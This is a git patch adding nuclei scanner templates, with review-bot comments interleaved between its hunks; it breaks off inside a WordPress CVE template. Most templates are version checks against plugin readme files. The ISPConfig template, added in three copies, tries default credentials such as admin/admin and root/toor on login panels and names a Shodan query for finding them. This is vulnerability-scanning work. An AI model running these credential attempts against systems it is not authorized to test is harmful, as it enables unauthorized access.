From 2eb80d1fa79a27e1d2b08753c952c37543af9b33 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Sun, 25 Aug 2024 12:34:37 +0000 Subject: [PATCH] 20240825 --- date.txt | 2 +- poc.txt | 20 +++++ poc/auth/ispconfig-default-login.yaml | 63 +++++++++++++++ poc/config/ispconfig-default-login.yaml | 63 +++++++++++++++ .../django-debug-exposure-csrf.yaml | 18 ++--- poc/cve/CVE-2023-0926.yaml | 59 ++++++++++++++ poc/cve/CVE-2023-6987.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-2254.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6493.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6499.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6617.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6631.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6665.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-6667.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-7351.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-7568.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-7656.yaml | 59 ++++++++++++++ poc/cve/CVE-2024-8120.yaml | 59 ++++++++++++++ poc/cve/cve-2008-5587.yaml | 19 ++--- poc/cve/cve-2017-14524.yaml | 42 +++++++--- poc/cve/cve-2018-1271.yaml | 16 ++-- poc/cve/cve-2018-15473.yaml | 14 ++-- poc/cve/cve-2018-15535.yaml | 21 ++--- poc/default/ispconfig-default-login.yaml | 63 +++++++++++++++ poc/detect/wowza-streaming-detect.yaml | 6 +- poc/favicon/favicon-generator.yaml | 59 ++++++++++++++ poc/header/header-footer-code.yaml | 59 ++++++++++++++ poc/header/log4j-header.yaml | 81 +++++++++++++++++-- poc/http/cl-te-http-smuggling.yaml | 72 ++++++++--------- .../yonyou-nc-cloud-jsinvoke-rce.yaml | 37 +++++---- .../Hikvision_iVMS-8700_Fileupload_Files.yaml | 17 ++-- poc/microsoft/Hikvision_iVMS-8700_upload.yaml | 45 +++-------- .../Hikvision_iVMS-8700_upload_action.yaml | 45 ++++++++--- .../dahua-wpms-addimgico-fileupload.yaml | 78 +++++++++++------- poc/other/Dahua_getUserInfoByUserName.yaml | 18 +++-- .../Hikvision_Env_Information_Leakage.yaml | 47 ++++------- poc/other/Ruijie_EXCU_SHELL.yaml | 30 ++++--- poc/other/devvn-image-hotspot.yaml | 59 ++++++++++++++ poc/other/kbucket.yaml | 59 ++++++++++++++ 
.../spring-functions-rce.yaml | 70 ++++++++-------- .../yonyou-nc-cloud-jsinvoke-rce.yaml | 37 +++++---- .../Hikvision_iVMS-8700_Fileupload_Files.yaml | 17 ++-- poc/upload/Hikvision_iVMS-8700_upload.yaml | 45 +++-------- .../Hikvision_iVMS-8700_upload_action.yaml | 45 ++++++++--- .../dahua-wpms-addimgico-fileupload.yaml | 78 +++++++++++------- ...ecology_E-Office_Uploadify_FileUpload.yaml | 51 +++++------- poc/upload/ecology_E-Office_upload.yaml | 49 +++-------- .../dahua-wpms-addimgico-fileupload.yaml | 78 +++++++++++------- 48 files changed, 1811 insertions(+), 479 deletions(-) create mode 100644 poc/auth/ispconfig-default-login.yaml create mode 100644 poc/config/ispconfig-default-login.yaml create mode 100644 poc/cve/CVE-2023-0926.yaml create mode 100644 poc/cve/CVE-2023-6987.yaml create mode 100644 poc/cve/CVE-2024-2254.yaml create mode 100644 poc/cve/CVE-2024-6493.yaml create mode 100644 poc/cve/CVE-2024-6499.yaml create mode 100644 poc/cve/CVE-2024-6617.yaml create mode 100644 poc/cve/CVE-2024-6631.yaml create mode 100644 poc/cve/CVE-2024-6665.yaml create mode 100644 poc/cve/CVE-2024-6667.yaml create mode 100644 poc/cve/CVE-2024-7351.yaml create mode 100644 poc/cve/CVE-2024-7568.yaml create mode 100644 poc/cve/CVE-2024-7656.yaml create mode 100644 poc/cve/CVE-2024-8120.yaml create mode 100644 poc/default/ispconfig-default-login.yaml create mode 100644 poc/favicon/favicon-generator.yaml create mode 100644 poc/header/header-footer-code.yaml create mode 100644 poc/other/devvn-image-hotspot.yaml create mode 100644 poc/other/kbucket.yaml diff --git a/date.txt b/date.txt index 8df515083d..928d43e6af 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240824 +20240825 diff --git a/poc.txt b/poc.txt index 24f176830a..101eeea9f7 100644 --- a/poc.txt +++ b/poc.txt 
@@ -3345,6 +3345,7 @@ ./poc/auth/iptime-default-login-8193.yaml ./poc/auth/iptime-default-login-8194.yaml ./poc/auth/iptime-default-login.yaml +./poc/auth/ispconfig-default-login.yaml ./poc/auth/issabel-login.yaml ./poc/auth/iubenda-cookie-law-solution-0f838161174c3a1452a42342cb556b62.yaml ./poc/auth/iubenda-cookie-law-solution-4353c7e138ff4cafc852aa03c1df2812.yaml @@ -7432,6 +7433,7 @@ ./poc/config/insecure-cors-configuration.yaml ./poc/config/insecure-network-security-config.yaml ./poc/config/insecure_transport_networksecurityconfig.yaml +./poc/config/ispconfig-default-login.yaml ./poc/config/ispconfig.yaml ./poc/config/joomla-config-dist-file.yaml ./poc/config/joomla-config-file-8374.yaml @@ -23803,6 +23805,7 @@ ./poc/cve/CVE-2023-0924-5f6349523fa3681f3fb3dddd26ea40cb.yaml ./poc/cve/CVE-2023-0924.yaml ./poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml +./poc/cve/CVE-2023-0926.yaml ./poc/cve/CVE-2023-0937-710621abe5c27a3f4d488a85b84e167f.yaml ./poc/cve/CVE-2023-0937.yaml ./poc/cve/CVE-2023-0940-68c8a812a7f4d3db6d4f04bb90d0d9a4.yaml @@ -32365,6 +32368,7 @@ ./poc/cve/CVE-2023-6986-40ce27a126a874a6f061b95c0f565f63.yaml ./poc/cve/CVE-2023-6986.yaml ./poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml +./poc/cve/CVE-2023-6987.yaml ./poc/cve/CVE-2023-6988-159f07c88d3476750318c076d61454ef.yaml ./poc/cve/CVE-2023-6988.yaml ./poc/cve/CVE-2023-6989-f3e101de1aabc79baa4bde571ba04314.yaml @@ -34365,6 +34369,7 @@ ./poc/cve/CVE-2024-2253-e80d4914f56d0bcf3f9f3038bce09c0d.yaml ./poc/cve/CVE-2024-2253.yaml ./poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml +./poc/cve/CVE-2024-2254.yaml ./poc/cve/CVE-2024-2255-c91737673f0c0121f5550bad7a472ece.yaml ./poc/cve/CVE-2024-2255.yaml ./poc/cve/CVE-2024-2256-baa716bf2c82d44f12eb5944a7db627c.yaml 
@@ -41689,6 +41694,7 @@ ./poc/cve/CVE-2024-6491-077c7077f2470ec50c66a49785e52870.yaml ./poc/cve/CVE-2024-6491.yaml ./poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml +./poc/cve/CVE-2024-6493.yaml ./poc/cve/CVE-2024-6494-1f03219d59ff7e715b118bf84690f350.yaml ./poc/cve/CVE-2024-6494.yaml ./poc/cve/CVE-2024-6495-7f7d4d9be9d13fb4035edaa3d3829c0a.yaml @@ -41700,6 +41706,7 @@ ./poc/cve/CVE-2024-6498-2ab2ecf188af29e491c09cc5e16d6c6a.yaml ./poc/cve/CVE-2024-6498.yaml ./poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml +./poc/cve/CVE-2024-6499.yaml ./poc/cve/CVE-2024-6500-76d6d82cf0d857f1f99bb5f0649b9e93.yaml ./poc/cve/CVE-2024-6500-e8578bf41793cff7e63bbe53d1903e0e.yaml ./poc/cve/CVE-2024-6500.yaml @@ -41782,6 +41789,7 @@ ./poc/cve/CVE-2024-6599-aa457f52df54a859bbebb756c962b901.yaml ./poc/cve/CVE-2024-6599.yaml ./poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml +./poc/cve/CVE-2024-6617.yaml ./poc/cve/CVE-2024-6621-02b2446a68489e575b652c2201b7d541.yaml ./poc/cve/CVE-2024-6621.yaml ./poc/cve/CVE-2024-6624-3e8f54a8f5a599fccb32276f2c459503.yaml @@ -41793,6 +41801,7 @@ ./poc/cve/CVE-2024-6629-d16f070910ae811c719a92ea7113c3c7.yaml ./poc/cve/CVE-2024-6629.yaml ./poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml +./poc/cve/CVE-2024-6631.yaml ./poc/cve/CVE-2024-6634-1294d62a2e83c6ca71566c3b267c34d2.yaml ./poc/cve/CVE-2024-6634.yaml ./poc/cve/CVE-2024-6635-0f3174f37f221bf395fa03e4aca4837b.yaml @@ -41810,9 +41819,11 @@ ./poc/cve/CVE-2024-6661-865ee81f979d667850ff2bc7887f6239.yaml ./poc/cve/CVE-2024-6661.yaml ./poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml +./poc/cve/CVE-2024-6665.yaml ./poc/cve/CVE-2024-6666-f524b500b74a1c90be50f56d9d664783.yaml ./poc/cve/CVE-2024-6666.yaml ./poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml +./poc/cve/CVE-2024-6667.yaml ./poc/cve/CVE-2024-6668-6a6e2b0e2761e93d3ce06e929012b06f.yaml ./poc/cve/CVE-2024-6668.yaml ./poc/cve/CVE-2024-6669-1f8f47157f2608b3fb02a0319a35eb1c.yaml 
@@ -41999,6 +42010,7 @@ ./poc/cve/CVE-2024-7350-fae9f5c8afaa9888e7d61c55abf3bb9e.yaml ./poc/cve/CVE-2024-7350.yaml ./poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml +./poc/cve/CVE-2024-7351.yaml ./poc/cve/CVE-2024-7353-51d3774cc31ba9c09e3ef4a4a7c21d55.yaml ./poc/cve/CVE-2024-7353.yaml ./poc/cve/CVE-2024-7355-464a77ba558154888cf73a5cab0a6cc4.yaml @@ -42054,6 +42066,7 @@ ./poc/cve/CVE-2024-7561-dd941493ec03049c383c879de09e421d.yaml ./poc/cve/CVE-2024-7561.yaml ./poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml +./poc/cve/CVE-2024-7568.yaml ./poc/cve/CVE-2024-7574-003dab2f041ca334b519548f81f66762.yaml ./poc/cve/CVE-2024-7574.yaml ./poc/cve/CVE-2024-7588-72d4c65f8b4a3c39e85f33895621e123.yaml @@ -42080,6 +42093,7 @@ ./poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml ./poc/cve/CVE-2024-7651.yaml ./poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml +./poc/cve/CVE-2024-7656.yaml ./poc/cve/CVE-2024-7689-f3a5e607572c3ebe82d6cfc65f846263.yaml ./poc/cve/CVE-2024-7689.yaml ./poc/cve/CVE-2024-7690-8d65eb5cdc8a149b1d94856146905574.yaml @@ -42113,6 +42127,7 @@ ./poc/cve/CVE-2024-7854-c405929374c8ffa2432434eb86f570c7.yaml ./poc/cve/CVE-2024-7854.yaml ./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml +./poc/cve/CVE-2024-8120.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -50374,6 +50389,7 @@ ./poc/default/iptime-default-login-8193.yaml ./poc/default/iptime-default-login-8194.yaml ./poc/default/iptime-default-login.yaml +./poc/default/ispconfig-default-login.yaml ./poc/default/jboss-default-password.yaml ./poc/default/jboss-jbpm-default-login.yaml ./poc/default/jeedom-default-login.yaml 
@@ -54147,6 +54163,7 @@ ./poc/favicon/favicon-detection-7446.yaml ./poc/favicon/favicon-detection.yaml ./poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml +./poc/favicon/favicon-generator.yaml ./poc/favicon/favicon-rotator-6f8bd28dbfbd78a39c26211650d54ded.yaml ./poc/favicon/favicon-rotator.yaml ./poc/favicon/favicon-switcher-87d4523b4710268d91b0abc72f0e31c5.yaml @@ -55695,6 +55712,7 @@ ./poc/header/header-footer-code-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/header/header-footer-code-manager-plugin.yaml ./poc/header/header-footer-code-manager.yaml +./poc/header/header-footer-code.yaml ./poc/header/header-footer-elementor-13cbbdbbd61a4c045ef2ff7386dfb654.yaml ./poc/header/header-footer-elementor-13cd3c728a036abc42340e590babbe8b.yaml ./poc/header/header-footer-elementor-232faaa29b050dd09edb1a0a86fedae0.yaml @@ -69420,6 +69438,7 @@ ./poc/other/devrant.yaml ./poc/other/devto.yaml ./poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml +./poc/other/devvn-image-hotspot.yaml ./poc/other/dexs-pm-system-868efdaccc5f16808a6fb06fe3a1cbec.yaml ./poc/other/dexs-pm-system-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/dexs-pm-system-f0982fd918eb9ba0d5bc8bd0faec3225.yaml @@ -76884,6 +76903,7 @@ ./poc/other/kbslider-plugin.yaml ./poc/other/kbslider.yaml ./poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml +./poc/other/kbucket.yaml ./poc/other/kd-coming-soon-2265a234dfded05f01d36b926bceb429.yaml ./poc/other/kd-coming-soon.yaml ./poc/other/kedacom-dvr接入网关.yaml diff --git a/poc/auth/ispconfig-default-login.yaml b/poc/auth/ispconfig-default-login.yaml new file mode 100644 index 0000000000..8151c6d669 --- /dev/null +++ b/poc/auth/ispconfig-default-login.yaml 
@@ -0,0 +1,63 @@ +id: ispconfig-default-login + +info: + name: ISPConfig - Default Password + author: pussycat0x + severity: high + description: | + ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + metadata: + verified: true + max-request: 9 + shodan-query: "http.title:\"ispconfig\"" + tags: default-login,ispconfig + +http: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Connection: close + Referer: {{RootURL}}/login/ + + username={{username}}&password={{password}}&s_mod=login&s_pg=index + + - | + GET /sites/web_vhost_domain_list.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Referer: {{RootURL}}/index.php + + attack: pitchfork + payloads: + username: + - 'admin' + - 'guest' + - 'root' + password: + - 'admin' + - 'password' + - 'toor' + + stop-at-first-match: true + host-redirects: true + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - Tools + - Websites + condition: and + + - type: status + status: + - 200 +# digest: 4b0a004830460221008a28f1d5944e66f8110267e1ef972142f26ab267c802b3014d9e149936f59664022100848b98acb511571071b1ad550692d756860ad969ec7f53b87045972e9996492b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/config/ispconfig-default-login.yaml b/poc/config/ispconfig-default-login.yaml new file mode 100644 index 0000000000..8151c6d669 --- /dev/null +++ b/poc/config/ispconfig-default-login.yaml 
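Review bot: This file is byte-identical to the copy added under poc/config/ in the next hunk (both land at blob 8151c6d669) and the diffstat lists a third copy under poc/default/, so a run over the repository issues the same nine credential attempts three times per host; that triples scan noise and, on panels that throttle or lock accounts after repeated failures, can lock out the real administrator. Keep a single copy and let the other category indexes point at it instead of duplicating the template. The `status: 200` matcher carries no `part`, so which of the three responses it is evaluated against depends on nuclei's default for multi-request raw templates; if that default is not the final response the check adds nothing and detection rests on the `body_3` word match alone, which is worth confirming and pinning in a comment.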
@@ -0,0 +1,63 @@ +id: ispconfig-default-login + +info: + name: ISPConfig - Default Password + author: pussycat0x + severity: high + description: | + ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + metadata: + verified: true + max-request: 9 + shodan-query: "http.title:\"ispconfig\"" + tags: default-login,ispconfig + +http: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Connection: close + Referer: {{RootURL}}/login/ + + username={{username}}&password={{password}}&s_mod=login&s_pg=index + + - | + GET /sites/web_vhost_domain_list.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Referer: {{RootURL}}/index.php + + attack: pitchfork + payloads: + username: + - 'admin' + - 'guest' + - 'root' + password: + - 'admin' + - 'password' + - 'toor' + + stop-at-first-match: true + host-redirects: true + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - Tools + - Websites + condition: and + + - type: status + status: + - 200 +# digest: 4b0a004830460221008a28f1d5944e66f8110267e1ef972142f26ab267c802b3014d9e149936f59664022100848b98acb511571071b1ad550692d756860ad969ec7f53b87045972e9996492b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml b/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml index 05a39f47be..3a8d38d44e 100644 --- a/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml +++ b/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml 
@@ -1,25 +1,25 @@ id: django-debug-exposure + info: name: Django Debug Exposure - author: geeknik - severity: high - reference: - - https://twitter.com/Alra3ees/status/1397660633928286208 + author: shelled + severity: medium tags: django,exposure + requests: - method: POST path: - "{{BaseURL}}/admin/login/?next=/admin/" + matchers-condition: and matchers: - type: status status: - - 500 + - 403 + - type: word part: body words: - - "DB_HOST" - - "DB_NAME" - - "DJANGO" - - "ADMIN_PASSWORD" + - 'seeing the help section of this page because you have DEBUG =' + - 'True' condition: and diff --git a/poc/cve/CVE-2023-0926.yaml b/poc/cve/CVE-2023-0926.yaml new file mode 100644 index 0000000000..71f35cdb7d --- /dev/null +++ b/poc/cve/CVE-2023-0926.yaml 
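Review bot: The rewritten word matcher at the end of the hunk pairs the DEBUG-page phrase with the bare token `True`, which under `condition: and` adds no selectivity (a page containing the longer phrase almost certainly contains `True` somewhere) while reading as if it pinned `DEBUG = True`; either match the contiguous text the Django CSRF-failure page actually renders, checked against a DEBUG-enabled test instance, or drop the second entry. The hunk also removes the only `reference:` entry and lowers `severity` from high to medium with no reason in the commit message; keep at least one reference so the finding stays traceable and note why the rating changed. The file sits under poc/cross_site_request_forgery/ with a `-csrf` suffix, but its `id` is `django-debug-exposure` and what it reports is debug mode, so the path is misleading even though the `django,exposure` tags are right.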
@@ -0,0 +1,59 @@ +id: CVE-2023-0926 + +info: + name: > + Custom Permalinks <= 2.6.0 - Authenticated(Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2023-0926 + metadata: + fofa-query: "wp-content/plugins/custom-permalinks/" + google-query: inurl:"/wp-content/plugins/custom-permalinks/" + shodan-query: 'vuln:CVE-2023-0926' + tags: cve,wordpress,wp-plugin,custom-permalinks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-permalinks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-permalinks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2023-6987.yaml b/poc/cve/CVE-2023-6987.yaml new file mode 100644 index 0000000000..83d64bf9e2 --- /dev/null +++ b/poc/cve/CVE-2023-6987.yaml 
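Review bot: The two `regex` extractors at the end of the hunk are duplicates: both are named `version`, read `body` with the same pattern and group, and differ only in `internal: true`; a single extractor should serve both the `compare_versions` DSL matcher and the output, so the pair can collapse to one (confirm the DSL matcher still resolves `version` once `internal` is dropped). The same duplicated pair appears in every other new CVE template in this commit (CVE-2023-6987, CVE-2024-2254, CVE-2024-6493, CVE-2024-6499, CVE-2024-6617, CVE-2024-6631, CVE-2024-6665, CVE-2024-6667, CVE-2024-7351, CVE-2024-7568). Separately, `severity` and the last `tags` entry do not follow the `cvss-score` in the same file: here 4.4 sits in the CVSS 3.1 Medium band but is labelled low, and CVE-2024-7351 (7.2) is labelled low while CVE-2024-7568 (9.6) is labelled medium, which hides the two most serious findings from anyone filtering on severity; derive both fields from the score with one rule. The check itself is only a readme `Stable tag` version comparison, which the `description` should state so a hit is read as "plugin version in range" rather than a confirmed exploitable instance, e.g. append `Detection is version-based (readme.txt Stable tag) and does not verify the vulnerability.`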
@@ -0,0 +1,59 @@ +id: CVE-2023-6987 + +info: + name: > + String Locator <= 2.6.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The String locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sql-column' parameter in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This required WP_DEBUG to be enabled in order to be exploited. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/18e0140e-ac24-48c6-aea0-bb0da203a817?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-6987 + metadata: + fofa-query: "wp-content/plugins/string-locator/" + google-query: inurl:"/wp-content/plugins/string-locator/" + shodan-query: 'vuln:CVE-2023-6987' + tags: cve,wordpress,wp-plugin,string-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/string-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "string-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-2254.yaml b/poc/cve/CVE-2024-2254.yaml new file mode 100644 index 0000000000..17586a8c3d --- /dev/null +++ b/poc/cve/CVE-2024-2254.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-2254 + +info: + name: > + RT Easy Builder – Advanced addons for Elementor <= 2.2 - Authenticated (Contributor+) Stored Cross-site Scripting + author: topscoder + severity: low + description: > + The RT Easy Builder – Advanced addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5fb289e-bd38-42ea-86a4-7816b59bd0b2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-2254 + metadata: + fofa-query: "wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-2254' + tags: cve,wordpress,wp-plugin,rt-easy-builder-advanced-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rt-easy-builder-advanced-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rt-easy-builder-advanced-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-6493.yaml b/poc/cve/CVE-2024-6493.yaml
new file mode 100644
index 0000000000..6d1ffe5b8f
--- /dev/null
+++ b/poc/cve/CVE-2024-6493.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-6493 + +info: + name: > + NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The NinjaTeam Header Footer Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3256da87-0d37-4c8f-9bac-95e3017e35d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6493 + metadata: + fofa-query: "wp-content/plugins/header-footer-code/" + google-query: inurl:"/wp-content/plugins/header-footer-code/" + shodan-query: 'vuln:CVE-2024-6493' + tags: cve,wordpress,wp-plugin,header-footer-code,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "header-footer-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6499.yaml b/poc/cve/CVE-2024-6499.yaml new file mode 100644 index 0000000000..508f8e11d2 --- /dev/null 
+++ b/poc/cve/CVE-2024-6499.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6499 + +info: + name: > + WordPress Button Plugin MaxButtons <= 9.7.8 - Full Path Disclosure + author: topscoder + severity: medium + description: > + The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 9.7.8. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fdd0694c-ea7e-4cf8-a8d8-82a2b02fecdf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6499 + metadata: + fofa-query: "wp-content/plugins/maxbuttons/" + google-query: inurl:"/wp-content/plugins/maxbuttons/" + shodan-query: 'vuln:CVE-2024-6499' + tags: cve,wordpress,wp-plugin,maxbuttons,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/maxbuttons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "maxbuttons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.7.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6617.yaml b/poc/cve/CVE-2024-6617.yaml new file mode 100644 index 0000000000..d56f4f7aed --- /dev/null +++ b/poc/cve/CVE-2024-6617.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-6617 + +info: + name: > + NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting via CSS Styles + author: topscoder + severity: low + description: > + The NinjaTeam Header Footer Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via CSS styles in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/521af15c-983c-49dc-a90b-b090281db78a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6617 + metadata: + fofa-query: "wp-content/plugins/header-footer-code/" + google-query: inurl:"/wp-content/plugins/header-footer-code/" + shodan-query: 'vuln:CVE-2024-6617' + tags: cve,wordpress,wp-plugin,header-footer-code,low + +http: + - method: GET + redirects: 